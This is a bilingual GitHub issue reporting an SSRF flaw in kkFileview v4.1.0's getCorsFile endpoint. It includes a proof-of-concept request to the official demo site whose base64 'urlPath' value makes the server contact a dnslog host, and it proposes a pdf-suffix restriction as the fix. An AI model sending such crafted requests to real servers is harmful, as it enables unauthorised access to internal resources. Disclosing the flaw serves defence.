You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
kkFileview v4.1.0 has an SSRF vulnerability, This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF),allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.
The vulnerability code iscn.keking.web.controller.OnlinePreviewController#getCorsFile , The 'urlPath' parameter is user-controllable, and request access without filtering special characters
问题描述
kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。
Description
kkFileview v4.1.0 has an SSRF vulnerability, This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF),allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.
漏洞位置
cn.keking.web.controller.OnlinePreviewController#getCorsFile,"urlPath"参数用户可控,且没有过滤特殊字符就进行请求访问
vulerable code location
The vulnerability code iscn.keking.web.controller.OnlinePreviewController#getCorsFile , The 'urlPath' parameter is user-controllable, and request access without filtering special characters
漏洞证明PoC
官方演示站点为最新4.1.0版本,以此为演示,访问漏洞位置(urlPath参数值需要经过base64编码):
https://file.keking.cn/getCorsFile?urlPath=aHR0cDovL3JlbW90ZS5ndGNoZWcuZG5zbG9nLmNu
The official demo site is the latest version 4.1.0. Take this as a demo to access the vulnerability location (the urlPath parameter value needs to be Base64 encoded):
https://file.keking.cn/getCorsFile?urlPath=aHR0cDovL3JlbW90ZS5ndGNoZWcuZG5zbG9nLmNu
dnslog成功收到请求
Dnslog successfully received the request
修复建议:限制请求文件后缀名为pdf
Repair suggestion: limit the request file suffix to pdf
The text was updated successfully, but these errors were encountered: